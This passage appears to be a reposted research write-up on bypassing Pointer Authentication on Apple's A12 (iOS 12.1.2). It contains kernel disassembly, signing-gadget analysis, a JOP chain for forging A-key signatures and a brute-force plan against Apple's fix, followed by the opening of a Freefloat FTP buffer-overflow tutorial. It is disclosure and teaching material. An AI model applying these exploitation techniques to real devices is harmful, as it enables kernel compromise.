small, it shouldn't be too long before I get two separate boots with the kernel at the exact same location in memory, meaning that the original, non-PAC'd value of the pointer would be the same both times. Then, if the A keys really are constant, the value of the PACIZA'd pointer should be the same in both boots, since the signing algorithm is deterministic and the pointer and context values being signed are the same both times. As a target, I chose to read sysclk_ops.c_gettime, which is a pointer to the function rtclock_gettime(). The results of this experiment over 30 trials are listed below, with colliding runs highlighted: slide = 000000000ce00000, c_gettime = b2902c70147f2050 slide = 0000000023200000, c_gettime = 61e2c2f02abf2050 slide = 0000000023000000, c_gettime = d98e57f02a9f2050 slide = 0000000006e00000, c_gettime = 0b9613700e7f2050 slide = 000000001ce00000, c_gettime = c3822bf0247f2050 slide = 0000000004600000, c_gettime = 00d248f00bff2050 slide = 000000001fe00000, c_gettime = 6aa61ef0277f2050 slide = 0000000013400000, c_gettime = fda847701adf2050 slide = 0000000015a00000, c_gettime = c5883b701d3f2050 slide = 000000000a200000, c_gettime = bbe37ef011bf2050 slide = 0000000014200000, c_gettime = a8ff9f701bbf2050 slide = 0000000014800000, c_gettime = 20e538701c1f2050 slide = 0000000019800000, c_gettime = 66f61b70211f2050 slide = 000000001c200000, c_gettime = 24aea37023bf2050 slide = 0000000006c00000, c_gettime = 5a9b42f00e5f2050 slide = 000000000e200000, c_gettime = 128526f015bf2050 slide = 000000001fa00000, c_gettime = 4cf2ad70273f2050 slide = 000000000a200000, c_gettime = 6ed3177011bf2050 slide = 000000000ea00000, c_gettime = 869d0f70163f2050 slide = 0000000015800000, c_gettime = 9898c2f01d1f2050 slide = 000000001d400000, c_gettime = 52a343f024df2050 slide = 000000001d600000, c_gettime = 7ea2337024ff2050 slide = 0000000023e00000, c_gettime = 31d3b3f02b7f2050 slide = 0000000008e00000, c_gettime = 27a72cf0107f2050 slide = 000000000fa00000, c_gettime = 2b988f70173f2050 slide = 0000000011000000, c_gettime = 86c7a670189f2050 slide = 0000000011a00000, c_gettime = 3d8103f0193f2050 slide = 000000001c200000, c_gettime = 56d444f023bf2050 slide = 000000001fe00000, c_gettime = 82fa3970277f2050 slide = 0000000008c00000, c_gettime = 89dcda70105f2050 As you can see, even though by all accounts the IA key is the same, PACIZAs for the same pointer generated across different boots are somehow different. The most straightforward solution I could think of was that iBoot or the kernel might be overwriting pac_key with a random value each boot before common_start runs, so that the PAC keys really are different each boot. Even though pac_key resides in __TEXT_EXEC.__text, which is protected against writes by KTRR, it's still possible to modify __TEXT_EXEC.__text before KTRR lockdown is performed. However, reading pac_key at runtime showed it still contained the value 0xfeedfacefeedfacf, so something else must be going on. I next performed an experiment to determine whether the PAC keys really were shared between userspace and the kernel, as the code suggested. I executed the PACIZA instruction in userspace on the address of the rtclock_gettime() function, and then compared against the PACIZA'd sysclk_ops.c_gettime pointer read from kernel memory. These two values differed despite the fact that the PAC keys should be the same in userspace and the kernel, so once again it appeared that the A12 was conjuring some sort of dark magic. Still not quite believing that pac_key wasn't being modified at runtime, I tried enumerating the B-key values of all threads on the system to see whether they really matched the 0xfeedfacefeedfacf value suggested by the code. Looking at the code for Switch_context in osfmk/arm64/cswitch.s, I determined that the value used as a seed to compute the B keys was being loaded from offset 0x458 of struct thread, the Mach struct representing a thread. This field is not present in the public XNU sources, so I decided to name it pac_key_seed. My experiment consisted of walking the global thread list and dumping each thread's pac_key_seed. I found that all kernel threads were indeed using the 0xfeedfacefeedfacf PAC key seed, while threads for userspace processes were using different, random seeds: pid 0 thread ffffffe00092c000 pac_seed feedfacefeedfacf pid 0 thread ffffffe00092c550 pac_seed feedfacefeedfacf pid 0 thread ffffffe00092caa0 pac_seed feedfacefeedfacf ... pid 258 thread ffffffe003597520 pac_seed 51c6b449d9c6e7a3 pid 258 thread ffffffe003764aa0 pac_seed 51c6b449d9c6e7a3 Thus, it did seem like the PAC keys for kernel threads were being initialized the same each boot, and yet the PAC'd pointers were different across boots. Something fishy was going on. Bypass attempts I next turned my attention to bypassing PAC using the weaknesses identified in the section "Weaknesses against kernel attackers". Since executing the same PACIZA instruction on the same pointer value with the same PAC keys across different boots was producing different results, there must be some unidentified source of per-boot randomness. This basically spelled doom for the "implement QARMA-64 in userspace and compute PACs manually" strategy, but I decided to try it anyway. Unsurprisingly, this did not work. Next I looked at whether I could set my own thread's PAC keys equal to the kernel PAC keys and forge kernel pointers in userspace. Ideally this would mean I'd set my IA key equal to the kernel's IA key, namely 0xfeedfacefeedfad2. However, as previously discussed, there's only one place in the kernel that appears to set the A keys, common_start, and yet userspace and kernel PAC codes are different anyway. So I decided to combine this approach with the PAC cross-key symmetry weakness and instead set my thread's IB key equal to the kernel's IA key, which should allow me to forge kernel PACIZA pointers by executing PACIZB in userspace. Unfortunately, the naive way of doing this, by overwriting the pac_key_seed field in the current thread, would probably crash or panic the system, since changing PAC keys during a thread's lifetime will break the thread's existing PAC signatures. And PAC signatures are checked all the time, most frequently when returning from a function via RETAB. This means that the only way to guarantee that changing a thread's PAC keys doesn't crash it or trigger a panic is to ensure that the thread does not call or return from any functions while the keys have been changed. The easiest way to do this is to spawn a thread that infinite loops in userspace executing PACIZB and storing the result to a global variable. Then we can overwrite the thread's pac_key_seed and force the thread off-core using contention; once the looping thread is rescheduled, its B keys will be set via Switch_context and the forgery will be executed. However, once again, the result of this experiment was unsuccessful: gettime = fffffff0161f2050 kPACIZA = faef2270161f2050 uPACIZA = 138a8670161f2050 uPACIZB forge = d7fd0ff0161f2050 It seemed that the A12 manages to break either cross-EL PAC symmetry or cross-key PAC symmetry. To gain a bit more insight, I devised a test specifically for cross-key PAC symmetry. This meant setting my thread's IB key equal to the DB key and checking whether the outputs of PACIZB and PACDZB looked similar, indicating that the same PAC was generated. Since the IB and DB keys are generated from the same seed and cannot be set independently, this actually involved 2 trials: first with seed value 0x11223344, and next with seed value 0x11223345: IB = 0x11223344 uPACIZB = 0028180100000000 DB = 0x11223345 uPACDZB = 00679e0100000000 IB = 0x11223345 uPACIZB = 003ea80100000000 DB = 0x11223346 uPACDZB = 0023c58100000000 The highlighted rows show the result of executing PACDZB and PACIZB on the same value from userspace with the same keys. On a standard ARMv8.3 implementation of Pointer Authentication, we'd expect most of the bits of the PAC to agree. However, the two PACs seem unrelated, suggesting that the A12 does indeed manage to break cross-key PAC symmetry. Implementation theories With all three weaknesses suggested by the original design demonstrably not applicable to the A12, it was time to try and work out what was really going on here. It's clear that Apple had considered the fact that Pointer Authentication as defined in the standard would do little to protect against kernel attackers with read/write, and thus they decided to implement a more robust defense. It's impossible to know what exactly they did without a concerted reverse engineering effort, but we can speculate based on the observed behavior. My first thought was that Apple had decided to implement a secure monitor again, like it had done on prior devices with Watchtower to protect against kernel patches. If the secure monitor could trap transitions between exception levels and trap writes to the PAC key registers, it could hide the true PAC keys from the kernel and implement other shenanigans to break PAC symmetries. However, I couldn't find evidence of a secure monitor inside the kernelcache. Another alternative is that Apple has decided to move the true PAC keys into the A12 itself, so that even the most powerful software attacker doesn't have the ability to read the keys. The keys could be generated randomly on boot or set via special registers by iBoot. Then, the keys that are fed to QARMA-64 (or whatever algorithm is actually being used to generate PACs) would be some combination of the random key, the standard key set via special registers, and the current exception level. For example, the A12 could theoretically store 10 random 128-bit PAC keys, one for each pair of an exception level (EL0 or EL1) and a standard PAC key (IA, IB, DA, DB, or GA). Then the PAC key used for any particular operation could be the XOR of the random PAC key corresponding to the operation (e.g. IB-EL0 for a PACIB instruction in userspace) with the standard PAC key set via the standard registers (e.g. APIBKey). Such a design wouldn't come without challenges (for example, you'd need a non-volatile place to store the random keys for when the core sleeps), but it would cleanly break the cross-EL and cross-key symmetries and prevent the keys from ever being disclosed, completely mitigating the three previously identified weaknesses. While I couldn't figure out the true implementation, I decided to assume the most robust design for the rest of my research: that the true keys are random and stored in the SoC itself. That way, any bypass strategy I found would be all but guaranteed to work regardless of the actual implementation. PAC EL-impersonation With zero leads for systematic weaknesses, I decided it was time to investigate PAC signing gadgets. The very first PACIA instruction occurs in a function I identified as vm_shared_region_slide_page(), and specifically as an inlined copy of vm_shared_region_slide_page_v3(). This function is present in the XNU sources, and has the following interesting comment in its main loop: uint8_t* rebaseLocation = page_content; uint64_t delta = page_entry; do { rebaseLocation += delta; uint64_t value; memcpy(&value, rebaseLocation, sizeof(value)); delta = ( (value & 0x3FF8000000000000) >> 51) * sizeof(uint64_t); // A pointer is one of : // { // uint64_t pointerValue : 51; // uint64_t offsetToNextPointer : 11; // uint64_t isBind : 1 = 0; // uint64_t authenticated : 1 = 0; // } // { // uint32_t offsetFromSharedCacheBase; // uint16_t diversityData; // uint16_t hasAddressDiversity : 1; // uint16_t hasDKey : 1; // uint16_t hasBKey : 1; // uint16_t offsetToNextPointer : 11; // uint16_t isBind : 1; // uint16_t authenticated : 1 = 1; // } bool isBind = (value & (1ULL << 62)) == 1; if (isBind) { return KERN_FAILURE; } bool isAuthenticated = (value & (1ULL << 63)) != 0; if (isAuthenticated) { // The new value for a rebase is the low 32-bits of the threaded value // plus the slide. value = (value & 0xFFFFFFFF) + slide_amount; // Add in the offset from the mach_header const uint64_t value_add = s_info->value_add; value += value_add; } else { // The new value for a rebase is the low 51-bits of the threaded value // plus the slide. Regular pointer which needs to fit in 51-bits of // value. C++ RTTI uses the top bit, so we'll allow the whole top-byte // and the bottom 43-bits to be fit in to 51-bits. ... } memcpy(rebaseLocation, &value, sizeof(value)); } while (delta != 0); The part about the "pointer" containing authenticated, hasBKey, and hasDKey bits suggests that this code is dealing with authenticated pointers, although all the code that actually performs PAC operations has been removed from the public sources. Furthermore, the other comment about C++ RTTI suggests that this code is specifically for rebasing userspace code. This means that the kernel would have to be aware of, and maybe perform PAC operations on, userspace pointers. Looking at the decompilation of this loop in IDA, we can see that there are many operations not present in the public source code: slide_amount = si->slide; offset = uservaddr - rebaseLocation; do { rebaseLocation += delta; value = *(uint64_t *)rebaseLocation; delta = (value >> 48) & 0x3FF8; if ( value & 0x8000000000000000 ) // isAuthenticated { value = slide_amount + (uint32_t)value + slide_info_entry->value_add; context = (value >> 32) & 0xFFFF; // diversityData if ( value & 0x1000000000000 ) // hasAddressDiversity context = (offset + rebaseLocation) & 0xFFFFFFFFFFFF | (context << 48); if ( si->UNKNOWN_FIELD && !(BootArgs->bootFlags & 0x4000000000000000) ) { daif = _ReadStatusReg(ARM64_SYSREG(3, 3, 4, 2, 1));// DAIF if ( !(daif & 0x80) ) __asm { MSR #6, #3 } _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) & 0xFFFFFFFFFFFFFFFB); __isb(0xFu); key_bits = (value >> 49) & 3; switch ( key_bits ) { case 0: value = ptrauth_sign...(value, ptrauth_key_asia, &context); break; case 1: value = ptrauth_sign...(value, ptrauth_key_asib, &context); break; case 2: value = ptrauth_sign...(value, ptrauth_key_asda, &context); break; case 3: value = ptrauth_sign...(value, ptrauth_key_asdb, &context); break; } _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) | 4); __isb(0xFu); ml_set_interrupts_enabled(~(daif >> 7) & 1); } } else { ... } memmove(rebaseLocation, &value, 8); } while ( delta ); It appears that the kernel is attempting to sign pointers on behalf of userspace. This is interesting because, as previously discussed, the A12 breaks cross-EL symmetry, which should mean that the kernel's signatures on userspace pointers will be invalid in userspace. It's unlikely that this freshly-introduced code is broken, so there must be some mechanism by which the kernel instructs the CPU to sign with userspace pointers instead. Searching for other instances of PAC* instructions like this, a pattern begins to emerge: whenever the kernel signs pointers on behalf of userspace, it wraps the PAC instructions by clearing and setting a bit in the S3_4_C15_C0_4 system register: MRS X8, #4, c15, c0, #4 ; S3_4_C15_C0_4 AND X8, X8, #0xFFFFFFFFFFFFFFFB MSR #4, c15, c0, #4, X8 ; S3_4_C15_C0_4 ISB ... ;; PAC stuff for userspace MRS X8, #4, c15, c0, #4 ; S3_4_C15_C0_4 ORR X8, X8, #4 MSR #4, c15, c0, #4, X8 ; S3_4_C15_C0_4 ISB Also, kernel code that sets/clears bit 0x4 of S3_4_C15_C0_4 is usually accompanied by code that disables interrupts and checks bit 0x4000000000000000 of BootArgs->bootFlags, as we see in the excerpt from vm_shared_region_slide_page_v3() above. We can infer that bit 0x4 of S3_4_C15_C0_4 controls whether PAC* instructions in the kernel use the EL0 keys or the EL1 keys: when this bit is set the kernel keys are used, otherwise the userspace keys are used. It makes sense that you'd need to disable interrupts while this bit is cleared, since otherwise the arrival of an interrupt may cause other kernel code to execute while the EL0 PAC keys are still in use, causing PAC validation failures that would panic the kernel. PAC-enable bits in SCTLR_EL1 Another thing I noticed while investigating system registers was that previously reserved bits of SCTLR_EL1 were now being used to enable/disable PAC instructions for certain keys. While looking at the exception vector for syscall entry, Lel0_synchronous_vector_64, I noticed some additional code referencing bootFlags and setting certain bits of SCTLR_EL1 that are marked as reserved in the ARM standard: ADRP X0, #const_boot_args@PAGE ADD X0, X0, #const_boot_args@PAGEOFF LDR X0, [X0,#(const_boot_args.bootFlags - 0xFFFFFFF0077A21B8)] AND X0, X0, #0x8000000000000000 CBNZ X0, loc_FFFFFFF0079B3320 MRS X0, #0, c1, c0, #0 ;; SCTLR_EL1 TBNZ W0, #0x1F, loc_FFFFFFF0079B3320 ORR X0, X0, #0x80000000 ;; set bit 31 ORR X0, X0, #0x8000000 ;; set bit 27 ORR X0, X0, #0x2000 ;; set bit 13 MSR #0, c1, c0, #0, X0 ;; SCTLR_EL1 Also, these bits are conditionally cleared on exception return: TBNZ W1, #2, loc_FFFFFFF0079B3AE8 ;; SPSR_EL1.M[3:0] & 0x4 ... LDR X2, [X2,#thread.field_460] CBZ X2, loc_FFFFFFF0079B3AE8 ... MRS X0, #0, c1, c0, #0 ;; SCTLR_EL1 AND X0, X0, #0xFFFFFFFF7FFFFFFF ;; clear bit 31 AND X0, X0, #0xFFFFFFFFF7FFFFFF ;; clear bit 27 AND X0, X0, #0xFFFFFFFFFFFFDFFF ;; clear bit 13 MSR #0, c1, c0, #0, X0 ;; SCTLR_EL1 While these bits are documented as reserved (with value 0) by ARM, I did find a reference to one of them in the XNU 4903.221.2 sources, in osfmk/arm64/proc_reg.h: // 13 PACDB_ENABLED AddPACDB and AuthDB functions enabled #define SCTLR_PACDB_ENABLED (1 << 13) This suggested that bit 13 at least is related to enabling PAC for the DB key. Since the only SCTLR_EL1 bits that are both (a) not mentioned in the file and (b) not set automatically via SCTLR_RESERVED are 31, 30, and 27, I speculated that these bits controlled the other PAC keys. (Presumably, leaving the reference to SCTLR_PACDB_ENABLED in the code was an oversight.) My guess is that bit 31 controls PACIA, bit 30 controls PACIB, bit 27 controls PACDA, and bit 13 controls PACDB. To test this theory, I executed the following sequence of PAC instructions in the debugger, both before and after setting the field at offset 0x460 of the current thread: pacia x0, x1 pacib x2, x3 pacda x4, x5 pacdb x6, x7 Before executing these instructions, I set each register Xn to the value 0x11223300 | n. Here's the result before setting field_460, with the PACs highlighted: x0 = 0x001d498011223300 # PACIA x1 = 0x0000000011223301 x2 = 0x0035778011223302 # PACIB x3 = 0x0000000011223303 x4 = 0x0062860011223304 # PACDA x5 = 0x0000000011223305 x6 = 0x001e6c8011223306 # PACDB x7 = 0x0000000011223307 And here's the result after: x0 = 0x0000000011223300 # PACIA x1 = 0x0000000011223301 x2 = 0x0035778011223302 # PACIB x3 = 0x0000000011223303 x4 = 0x0000000011223304 # PACDA x5 = 0x0000000011223305 x6 = 0x0000000011223306 # PACDB x7 = 0x0000000011223307 This seems to confirm our theory: before setting field_460, the PAC instructions worked as expected, but after setting field_460, all except PACIB have been effectively turned into NOPs. Using this fact for exploitation is tricky, since overwriting field_460 in a kernel thread does not seem to disable PAC in that thread due to additional checks. Nonetheless, the existence of these PAC-enable bits in SCTLR_EL1 was interesting in its own right. The (non-)existence of signing gadgets At this point, since we have no systematic weaknesses against Apple's more robust design, we're looking for a signing gadget usable only via read/write. That means we're looking for a sequence of code that will read a pointer from memory, sign it, and write it back to memory. But we can't yet call arbitrary kernel addresses, so we also need to ensure that this code path is actually triggerable, either during the course of normal kernel operation, or by using our iokit_user_client_trap() call primitive to call a kernel function to which there already exists a PACIZA'd pointer. Apple has clearly tried to scrub the kernelcache of any obvious signing gadgets. All occurrences of the PACIA instruction are either unusable or wrapped by code that switches to the userspace PAC keys (via S3_4_C15_C0_4), so there's no way we can convince the kernel to perform a PACIA forgery using only read/write. This left just PACIZA. While there were many more occurrences of the PACIZA instruction, most of them were useless since the result wasn't written to memory. Additionally, gadgets that actually did load and store the pointer were almost always preceded by AUTIA, which would fail if the pointer we were signing didn't already have a valid PAC: LDR X10, [X9,#0x30]! CBNZ X19, loc_FFFFFFF007EBD330 CBZ X10, loc_FFFFFFF007EBD330 MOV X19, #0 MOV X11, X9 MOVK X11, #0x14EF,LSL#48 AUTIA X10, X11 PACIZA X10 STR X10, [X9] Thus, it appeared I was out of luck. The fourth weakness After giving up on signing gadgets and pursuing a few other dead ends, I eventually wondered: What would actually happen if PACIZA was used to sign an invalid pointer validated by AUTIA? I'd assumed that such a pointer would be useless, but I decided to look at the ARM pseudocode to see what would actually happen. To my surprise, the standard revealed a funny interaction between AUTIA and PACIZA. When AUTIA finds that an authenticated pointer's PAC doesn't match the expected value, it corrupts the pointer by inserting an error code into the pointer's extension bits: // Auth() // ====== // Restores the upper bits of the address to be all zeros or all ones (based on // the value of bit[55]) and computes and checks the pointer authentication // code. If the check passes, then the restored address is returned. If the // check fails, the second-top and third-top bits of the extension bits in the // pointer authentication code field are corrupted to ensure that accessing the // address will give a translation fault. bits(64) Auth(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data, bit keynumber) bits(64) PAC; bits(64) result; bits(64) original_ptr; bits(2) error_code; bits(64) extfield; // Reconstruct the extension field used of adding the PAC to the pointer boolean tbi = CalculateTBI(ptr, data); integer bottom_PAC_bit = CalculateBottomPACBit(ptr<55>); extfield = Replicate(ptr<55>, 64); if tbi then ... else original_ptr = extfield<64-bottom_PAC_bit-1:0>:ptr<bottom_PAC_bit-1:0>; PAC = ComputePAC(original_ptr, modifier, K<127:64>, K<63:0>); // Check pointer authentication code if tbi then ... else if ((PAC<54:bottom_PAC_bit> == ptr<54:bottom_PAC_bit>) && (PAC<63:56> == ptr<63:56>)) then result = original_ptr; else error_code = keynumber:NOT(keynumber); result = original_ptr<63>:error_code:original_ptr<60:0>; return result; Meanwhile, when PACIZA is adding a PAC to a pointer, it actually signs the pointer with corrected extension bits, and then corrupts the PAC if the extension bits were originally invalid. From the pseudocode for AddPAC() above: ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>; PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>); // Check if the ptr has good extension bits and corrupt the pointer // authentication code if not; if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then PAC<top_bit-1> = NOT(PAC<top_bit-1>); Critically, PAC* instructions will corrupt the PAC of a pointer with invalid extension bits by flipping a single bit of the PAC. While this will certainly invalidate the PAC, this also means that the true PAC can be reconstructed if we can read out the value of a PAC*-forgery on a pointer produced by an AUT* instruction! So sequences like the one above that consist of an AUTIA followed by a PACIZA can be used as signing gadgets even if we don't have a validly signed pointer to begin with: we just have to flip a single bit in the forged PAC. A complete A-key forgery strategy for 16C50 With the existence of a single PACIZA signing gadget, we can begin our construction of a complete forgery strategy for the A keys on A12 devices running build 16C50. Stage 1: PACIZA-forgery A bit of sleuthing reveals that the gadget we found is part of the function sysctl_unregister_oid(), which is responsible for unregistering a sysctl_oid struct from the global sysctl tree. (Once again, this function does not have any PAC-related code in the public sources, but these operations are present on PAC-enabled devices.) Here's a listing of the relevant parts of this function from IDA: void sysctl_unregister_oid(sysctl_oid *oidp) { sysctl_oid *removed_oidp = NULL; sysctl_oid *old_oidp = NULL; BOOL have_old_oidp; void **handler_field; void *handler; uint64_t context; ... if ( !(oidp->oid_kind & 0x400000) ) // Don't enter this if { ... } if ( oidp->oid_version != 1 ) // Don't enter this if { ... } sysctl_oid *first_sibling = oidp->oid_parent->first; if ( first_sibling == oidp ) // Enter this if { removed_oidp = NULL; old_oidp = oidp; oidp->oid_parent->first = old_oidp->oid_link; have_old_oidp = 1; } else { ... } handler_field = &old_oidp->oid_handler; handler = old_oidp->oid_handler; if ( removed_oidp || !handler ) // Take the else { ... } else { removed_oidp = NULL; context = (0x14EF << 48) | ((uint64_t)handler_field & 0xFFFFFFFFFFFF); *handler_field = ptrauth_sign_unauthenticated( ptrauth_auth_function(handler, ptrauth_key_asia, &context), ptrauth_key_asia, 0); ... } ... } If we can get this function called with a crafted sysctl_oid that causes the indicated path to be taken, we should be able to forge arbitrary PACIZA pointers. There aren't any existing global PACIZA'd pointers to this function, so we can't call it directly using our iokit_user_client_trap() primitive, but as luck would have it, there are several global PACIZA'd function pointers that themselves call into it. This is because several kernel extensions register sysctls that they need to unregister before they're unloaded; these kexts often have a module termination function that calls sysctl_unregister_oid(), and the kmod_info struct describing the kext contains a PACIZA'd pointer to the module termination function. The best candidate I could find was l2tp_domain_module_stop(), which is part of the com.apple.nke.lttp kext. This function will perform some deinitialization work before calling sysctl_unregister_oid() on the global sysctl__net_ppp_l2tp object. Thus, we can PACIZA-sign an arbitrary pointer by overwriting the contents of sysctl__net_ppp_l2tp, calling l2tp_domain_module_stop() via the existing global PACIZA'd pointer, and then reading out sysctl__net_ppp_l2tp's oid_handler field and flipping bit 62. Stage 2: PACIA/PACDA forgery While this lets us PACIZA-forge any pointer we want, it'd be nice to be able to perform PACIA/PACDA forgeries as well, since then we could implement the full bypass described in the section "Finding an entry point for kernel code execution". To do that, I next looked into whether our PACIZA primitive could turn any of the PACIA instructions in the kernelcache into viable signing gadgets. The most likely candidate for both PACIA and PACDA was an unknown function sub_FFFFFFF007B66C48, which contains the following instruction sequence: MRS X9, #4, c15, c0, #4 ; S3_4_C15_C0_4 AND X9, X9, #0xFFFFFFFFFFFFFFFB MSR #4, c15, c0, #4, X9 ; S3_4_C15_C0_4 ISB LDR X9, [X2,#0x100] CBZ X9, loc_FFFFFFF007B66D24 MOV W10, #0x7481 PACIA X9, X10 STR X9, [X2,#0x100] ... LDR X9, [X2,#0xF8] CBZ X9, loc_FFFFFFF007B66D54 MOV W10, #0xCBED PACDA X9, X10 STR X9, [X2,#0xF8] ... MRS X9, #4, c15, c0, #4 ; S3_4_C15_C0_4 ORR X9, X9, #4 MSR #4, c15, c0, #4, X9 ; S3_4_C15_C0_4 ISB ... PACIBSP STP X20, X19, [SP,#var_20]! ... ;; Function body (mostly harmless) LDP X20, X19, [SP+0x20+var_20],#0x20 AUTIBSP MOV W0, #0 RET What makes sub_FFFFFFF007B66C48 a good candidate is that the PACIA/PACDA instructions occur before the stack frame is set up. Ordinarily, calling into the middle of a function will cause problems when the function returns, since the function's epilogue will tear down a frame that was never set up. But since this function's stack frame is set up after our desired entry points, we can use our kernel call primitive to jump directly to these instructions without causing any problems. Of course, we still have another issue: the PACIA and PACDA instructions use registers X9 and X10, while our kernel call primitive based on iokit_user_client_trap() only gives us control of registers X1 through X6. We'll need to figure out how to get the values we want into the appropriate registers. In fact, we already found a solution to this very problem earlier: JOP gadgets. Searching through the kernelcache, just three kexts seem to hold the vast majority of non-PAC'd indirect branches: FairPlayIOKit, LSKDIOKit, and LSKDIOKitMSE. These kexts even stand out in IDA's navigator bar as islands of red in a sea of blue, since IDA cannot create functions out of many of the instructions in these kexts: It seems that these kexts use some sort of obfuscation to hide control flow and make reverse engineering more difficult. Many jumps in this code are performed indirectly through registers. Unfortunately, in this case the obfuscation actually makes our job as attackers easier, since it gives us a plethora of useful JOP gadgets not protected by PAC. For our specific use case, we have control of PC and X1 through X6, and we're trying to set X2 to some writable memory region, X9 to the pointer we want to sign, and X10 to the signing context, before jumping to the signing gadget. I eventually settled on executing the following JOP program to accomplish this: X1 = MOV_X10_X3__BR_X6 X2 = KERNEL_BUFFER X3 = CONTEXT X4 = POINTER X5 = MOV_X9_X0__BR_X1 X6 = PACIA_X9_X10__STR_X9_X2_100 MOV X0, X4 BR X5 MOV X9, X0 BR X1 MOV X10, X3 BR X6 PACIA X9, X10 STR X9, [X2,#0x100] ... And with that, we now have a complete bypass strategy that allows us to forge arbitrary PAC signatures using the A keys. Timeline After sharing my original kernel read/write exploit on December 18, 2018, I reported the proof-of-concept PAC bypass built on top of voucher_swap on December 30. This POC could produce arbitrary A-key PAC forgeries and call arbitrary kernel functions with 7 arguments, just like on non-PAC devices. Apple quickly responded suggesting that the latest iOS 12.1.3 beta, build 16D5032a, should mitigate the issue. As this build also fixed the voucher_swap bug, I couldn't test this directly, but I did inspect the kernelcache manually and found that Apple had mitigated the sysctl_unregister_oid() gadget used to produce the first PACIZA forgery. This build was released on December 19, near the beginning of my research into PAC and long before I reported the bypass to Apple. Thus, like the case with the voucher_swap bug, I suspect that another researcher found and reported this issue first. Apple's fix In order to fix the sysctl_unregister_oid() gadget (and other AUTIA-PACIA gadgets), Apple has added a few instructions to ensure that if the AUTIA fails, then the resulting invalid pointer will be used instead of the result of PACIZA: LDR X10, [X9,#0x30]! ;; X10 = old_oidp->oid_handler CBNZ X19, loc_FFFFFFF007EBD4A0 CBZ X10, loc_FFFFFFF007EBD4A0 MOV X19, #0 MOV X11, X9 ;; X11 = &old_oidp->oid_handler MOVK X11, #0x14EF,LSL#48 ;; X11 = 14EF`&oid_handler MOV X12, X10 ;; X12 = oid_handler AUTIA X12, X11 ;; X12 = AUTIA(handler, 14EF`&handler) XPACI X10 ;; X10 = XPAC(handler) CMP X12, X10 PACIZA X10 ;; X10 = PACIZA(XPAC(handler)) CSEL X10, X10, X12, EQ ;; X10 = (PAC_valid ? PACIZA : AUTIA) STR X10, [X9] With this change, we can no longer PACIZA-forge a pointer unless we already have a PACIA forgery with a specific context. Brute-force strategies While this does mitigate the fast, straightforward strategy outlined above, with enough time it is still susceptible to brute forcing. Now, I couldn't test this explicitly without an exploit for iOS 12.1.3, but I was able to simulate how long it might take using my exploit on iOS 12.1.2. The problem is that even though we don't have an existing PACIA-forgery for the pointer we want to PACIZA-forge, we can use our kernel call primitive to execute this gadget repeatedly with different guesses for the valid PAC. Unlike most other instances in which authenticated pointers are used, guessing incorrectly here won't actually trigger a panic: we can just read out the result to see whether we guessed correctly (in which case the oid_handler field will have a PAC added) or incorrectly (in which case oid_handler will look like the result of a failed AUTIA). Looking back at the list of PAC'd pointers generated in my very first experiment in the subsection "Observing runtime behavior", I compared the extension bits of all the pointers to determine that the PAC was masked into the bits 0xff7fff8000000000. This means the A12 is using a 24-bit PAC, or about 16 million possibilities. In my experiments, I found that invoking l2tp_domain_module_stop() and l2tp_domain_module_start() 256 times took about 13.2 milliseconds. Thus, exhaustively checking all 16 million possible PACs should take around 15 minutes. And unless there were other changes I didn't notice, once a single PACIZA forgery is produced, the rest of the A-key bypass strategy should still be possible. (Initializing/deinitializing the module more than about 4096 times started to produce noticeable slowdowns; I didn't identify the source of this slowness, but I do suspect that with effort it should be possible to work around it.) Conclusion In this post we put Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS under the microscope, describing observed behavior, theorizing about how deviations from the ARM reference might be implemented under the hood, and analyzing the system for weaknesses that would allow a kernel attacker with read/write capabilities to forge PACs for arbitrary pointers. This analysis culminated with a complete bypass strategy and proof-of-concept implementation that allows the attacker to perform arbitrary A-key forgeries on an iPhone XS running iOS 12.1.2. Such a bypass is sufficient for achieving arbitrary kernel code execution through JOP. This strategy was partially mitigated with the release of iOS 12.1.3 beta 16D5032a, although there are indications that it might still be possible to bypass the mitigation via a brute-force approach. Despite these flaws, PAC remains a solid and worthwhile mitigation. Apple's hardening of PAC in the A12 SoC, which was clearly designed to protect against kernel attackers with read/write, meant that I did not find a systematic break in the design and had to rely on signing gadgets, which are easy to patch via software. As with any complex new mitigation, loopholes are not uncommon in the first few iterations. However, given the fragility of the current bypass technique (relying on, among other things, the single IOUserClient class that allows us to overwrite its IOExternalTrap, one of a very small number of usable PACIZA gadgets, and a handful of non-PAC'd JOP gadgets introduced by obfuscation), I believe it's possible for Apple to harden their implementation to the point that strong forgery bypasses become rare. Furthermore, PAC shows promise as a tool to make data-only kernel attacks trickier and less powerful. For example, I could see Apple adding something akin to a __security_critical attribute that enables PAC for C pointers that are especially prone to being hijacked during exploits, such as ipc_port's ip_kobject field. Such a mitigation wouldn't end any bug classes, since sophisticated attackers could find other ways of leveraging vulnerabilities into kernel read/write primitives, but it would raise the bar and make simple exploit strategies like those used in voucher_swap much harder (and hopefully less reliable) to pull off. Posted by Ben at 11:25 AM Sursa: https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html
-
Introduction to Network Protocol Fuzzing & Buffer Overflow Exploitation Jan 29, 2019 by Joey Lane Tags: Buffer Overflow / OSCP / OSCE / Fuzzing / Exploit Development / In this article we will introduce the fundamentals of discovering and exploiting buffer overflow vulnerabilities in Windows applications. If you have never written an exploit before, this may seem a bit intimidating at first. Perhaps you are pursuing your OSCP certification and have just been introduced to the concept of buffer overflow. I assure you this is not as difficult as it seems. If you dedicate a little bit of time to it, you can learn it! Software Requirements A virtualization platform (Virtualbox, VMware, etc.) A Windows XP, Vista, or 7 virtual machine (32-bit) A Kali Linux virtual machine (32-bit) Immunity Debugger (https://www.immunityinc.com/products/debugger/) Wireshark Python 2.7 Mona.py (https://github.com/corelan/mona) Metasploit Framework Freefloat FTP Server During this exercise we will walk through the process of discovering and exploiting a vulnerability in the Freefloat FTP Server application. We are going to use two virtual machines hosted on a private network to do this. We will be hosting the vulnerable application in a Windows XP virtual machine, and attacking from a Kali Linux virtual machine. In our Windows VM we will be using Immunity Debugger and ‘mona.py’ to closely examine the Freefloat FTP Server application. In our Kali Linux VM we will be working with Python, Wireshark, and Metasploit Framework to 